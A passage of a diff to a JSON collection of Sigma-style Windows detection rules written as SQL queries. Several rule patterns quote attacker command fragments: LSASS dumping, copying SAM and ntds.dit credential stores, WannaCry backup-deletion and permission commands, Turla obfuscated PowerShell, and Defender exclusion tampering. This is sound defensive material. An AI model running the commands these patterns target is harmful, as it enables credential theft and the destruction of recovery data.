This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + }, + { + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", + "id": "48917adc-a28e-4f5d-b729-11e75da8941f", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. 
Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE 
(EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_reg_defender_exclusion.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "CL_Mutexverifiers.ps1 Proxy Execution", + "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "status": "experimental", + "description": "Detects the use of a Microsoft signed script to execute commands", + "author": "oscd.community, Natalia Shornikova, frack113", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + 
"attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", + "description": "Detects suspicious Rundll32 execution 
from control.exe as used by Equation Group and Exploit Kits", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE 
'%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1204" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe 
/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Shells Spawned by Java", + "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "status": "experimental", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. 
log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_java_susp_child_process_2.yml" }, { - "title": "Ilasm Lolbin Use Compile C-Sharp", - "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "title": "Install New Package Via Winget Local Manifest", + "id": "313d6012-51a0-4d93-8dfc-de8553239e25", "status": "experimental", - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "author": "frack113", + "description": "Detects usage of winget to install applications via manifest file. 
Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", + "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\') AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ilasm.yml" + "filename": "proc_creation_win_winget_local_install_via_manifest.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Suspicious Diantz Download and Compress Into a CAB File", - "id": "185d7418-f250-42d0-b72e-0c8b70661e93", - "status": "experimental", - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "author": "frack113", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "status": "test", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate 
use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "DllUnregisterServer Function Call Via Msiexec.EXE", - "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "title": "Suspicious CustomShellHost Execution", + "id": "84b14121-9d14-416e-800b-f3b829c5a14d", "status": "experimental", - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "author": "frack113", + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ 
"attack.defense_evasion", - "attack.t1218.007" + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_dll.yml" + "filename": "proc_creation_win_lolbin_customshellhost.yml" }, { - "title": "Weak or Abused Passwords In CLI", - "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", "status": "experimental", - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. 
An example would be a threat actor creating a new user via the net command and providing the password inline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution" ], "falsepositives": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" + "Legitimate administrative tasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.005" + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], 
"falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Remote Access Tool - RURAT Execution From Unusual Location", - "id": "e01fa958-6893-41d4-ae03-182477c5e77d", - "status": "experimental", - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysprep on AppData Folder", + "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "status": "test", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + 
